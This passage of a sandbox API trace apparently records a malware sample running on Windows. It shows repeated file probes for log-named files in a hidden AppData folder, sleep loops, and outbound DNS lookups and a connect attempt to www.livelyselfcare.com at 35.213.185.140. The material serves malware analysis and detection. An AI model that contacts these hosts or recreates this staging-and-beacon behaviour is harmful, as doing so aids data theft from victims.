IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.755] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.755] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.755] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.755] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.755] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.755] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.755] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.755] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.755] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.755] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.755] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.755] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.756] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.756] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.756] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.756] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.756] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.756] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.756] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.756] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.756] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.756] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.756] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.756] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.756] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.756] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.756] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.756] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.756] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x10 [0204.756] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.756] Sleep (dwMilliseconds=0x7d0) [0204.769] Sleep (dwMilliseconds=0x7d0) [0204.784] Sleep (dwMilliseconds=0x7d0) [0204.804] Sleep (dwMilliseconds=0x7d0) [0204.816] Sleep (dwMilliseconds=0x7d0) [0204.832] Sleep (dwMilliseconds=0x7d0) [0204.847] Sleep (dwMilliseconds=0x7d0) [0204.868] Sleep (dwMilliseconds=0x7d0) [0204.878] Sleep (dwMilliseconds=0x7d0) [0204.894] Sleep (dwMilliseconds=0x7d0) [0204.909] Sleep (dwMilliseconds=0x7d0) [0204.925] Sleep (dwMilliseconds=0x7d0) [0204.946] Sleep (dwMilliseconds=0x7d0) [0204.956] Sleep (dwMilliseconds=0x7d0) [0204.972] Sleep (dwMilliseconds=0x7d0) [0204.988] Sleep (dwMilliseconds=0x7d0) [0205.008] Sleep (dwMilliseconds=0x7d0) [0205.019] Sleep (dwMilliseconds=0x7d0) [0205.034] Sleep (dwMilliseconds=0x7d0) [0205.051] Sleep (dwMilliseconds=0x7d0) [0205.065] Sleep (dwMilliseconds=0x7d0) [0205.081] Sleep (dwMilliseconds=0x7d0) [0205.096] Sleep (dwMilliseconds=0x7d0) [0205.112] Sleep (dwMilliseconds=0x7d0) [0205.128] Sleep (dwMilliseconds=0x7d0) [0205.148] socket (af=2, type=1, protocol=6) returned 0xa40 [0205.148] getaddrinfo (in: pNodeName="www.coolkidssale.com", pServiceName="80", pHints=0x6f0c9d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0ca08 | out: ppResult=0x6f0ca08*=0x0) returned 11001 [0205.158] Sleep (dwMilliseconds=0x7d0) [0205.159] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.159] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.159] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x10 [0205.159] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0205.159] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.159] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.159] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0205.159] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0205.159] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.159] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.160] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0205.160] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0205.160] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.160] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.160] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0205.160] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0205.160] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.160] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.160] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0205.160] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0205.160] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.160] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.160] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0205.160] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0205.160] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.160] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.160] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0205.160] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0205.161] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.161] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.161] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0205.161] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0205.161] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.161] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.161] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0205.161] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0205.161] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.161] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.161] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0205.161] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0205.161] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.161] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.161] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x10 [0205.161] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0205.161] Sleep (dwMilliseconds=0x7d0) [0205.175] Sleep (dwMilliseconds=0x7d0) [0205.191] Sleep (dwMilliseconds=0x7d0) [0205.210] Sleep (dwMilliseconds=0x7d0) [0205.221] Sleep (dwMilliseconds=0x7d0) [0205.238] Sleep (dwMilliseconds=0x7d0) [0205.277] Sleep (dwMilliseconds=0x7d0) [0205.284] Sleep (dwMilliseconds=0x7d0) [0205.299] Sleep (dwMilliseconds=0x7d0) [0205.315] Sleep (dwMilliseconds=0x7d0) [0205.331] Sleep (dwMilliseconds=0x7d0) [0205.352] Sleep (dwMilliseconds=0x7d0) [0205.362] Sleep (dwMilliseconds=0x7d0) [0205.388] Sleep (dwMilliseconds=0x7d0) [0205.393] Sleep (dwMilliseconds=0x7d0) [0205.408] Sleep (dwMilliseconds=0x7d0) [0205.424] Sleep (dwMilliseconds=0x7d0) [0205.468] Sleep (dwMilliseconds=0x7d0) [0205.471] Sleep (dwMilliseconds=0x7d0) [0205.488] Sleep (dwMilliseconds=0x7d0) [0205.502] Sleep (dwMilliseconds=0x7d0) [0205.523] Sleep (dwMilliseconds=0x7d0) [0205.533] Sleep (dwMilliseconds=0x7d0) [0205.555] Sleep (dwMilliseconds=0x7d0) [0205.564] Sleep (dwMilliseconds=0x7d0) [0205.580] Sleep (dwMilliseconds=0x7d0) [0205.597] Sleep (dwMilliseconds=0x7d0) [0205.618] Sleep (dwMilliseconds=0x7d0) [0205.627] Sleep (dwMilliseconds=0x7d0) [0205.643] Sleep (dwMilliseconds=0x7d0) [0205.658] Sleep (dwMilliseconds=0x7d0) [0205.679] socket (af=2, type=1, protocol=6) returned 0x614 [0205.680] getaddrinfo (in: pNodeName="www.livelyselfcare.com", pServiceName="80", pHints=0x6f0cd78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0cda8 | out: ppResult=0x6f0cda8*=0x3eb4450*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x70ad7b0*(sa_family=2, sin_port=0x50, sin_addr="35.213.185.140"), ai_next=0x0)) returned 0 [0206.189] htons (hostshort=0x50) returned 0x5000 [0206.189] connect (s=0x614, name=0x70ad7b0*(sa_family=2, 